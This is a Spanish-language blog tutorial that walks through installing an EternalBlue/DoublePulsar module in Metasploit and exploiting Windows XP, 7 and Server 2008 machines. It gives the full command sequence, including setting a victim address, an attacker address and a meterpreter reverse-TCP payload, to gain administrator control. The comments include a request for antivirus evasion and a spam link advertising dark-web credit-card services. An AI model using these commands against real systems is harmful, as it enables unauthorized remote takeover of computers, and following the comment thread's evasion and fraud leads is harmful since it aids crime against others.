EternalBlue en Metasploit - SMB Exploit -

    En esta ocasión estaré mostrando como instalar el modulo de EternalBlue en MetaSploit para atacar sistemas vulnerables windows los cuales son windows xp, 7 & server 2008. Esta herramienta fue filtrada de la NSA el pasado año la cual atacaba una vulnerabilidad en los sistemas mencionados.

Bien primero debemos descargar el modulo desde su repositorio de Github.

> https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git

> dpkg --add-architecture i386 && apt-get update && apt-get install wine32

Luego descargamos python2.7 y pywin32, instalamos ambos .exe con wine

Una vez lo tengamos descargados debemos mover el archivo eternalblue_doublepulsar.rb a la ruta  /usr/share/metasploit-framework/modules/exploits/windows/smb/ y listo ahora pasamos a abrir nuestro metasploit

> msfconsole

> use exploit/windows/smb/eternalblue_doublepulsar

Luego le indicamos la ruta en la cual tenemos nuestro archivo de eternalblue.

> set eternalbluepath /root/Eternalblue-Doublepulsar-Metasploit/deps

Ahora le pasaremos la ip de nuestra victima y luego la ip de nuestra maquina.

> rhost 192.168.0.9

> lhost 192.168.0.11

y le indicamos el tipo de payload.

> set payload windows/x64/meterpreter/reverse_tcp

> exploit

 Una vez ejecutemos el comando exploit hará el proceso del envió de el DLL malicioso a la maquina victima para a si ejecutar nuestro payload. En caso de que nos de error es que la maquina no tiene el puerto 445 abierto o simplemente no es vulnerable. Existen maneras de comprobar si ese puerto esta abierto y también podríamos saber si nuestra victima es vulnerable o no.

Y como podemos ver ya tendríamos nuestra meterpreter y lo mejor de todo es que tendremos todos los permisos de administrador teniendo control total de la maquina.

Espero que les haya gustado este post, no olviden compartir y dar me gusta a nuestra pagina.

3 comentarios:

  1. Hola, una consulta, como se puede hacer para que el antivirus no detecte el exploit. cuand el AV está desactivado logro la conexiòn de meterpreter, de lo contrario el antivirus bloquea la conexiòn! Vi que se puede setear el encoder, pero no se si con eso solo alcanza para que el AV no lo detecte! Gracias!

    ResponderBorrar
  2. We will be getting a reverse TCP connection from the victim machine by using a small backdoor using metasploit on windows.

    ResponderBorrar
  3. If you are looking to apply for a credit card over the Internet without a credit check, Read more about my website: dark web links

    ResponderBorrar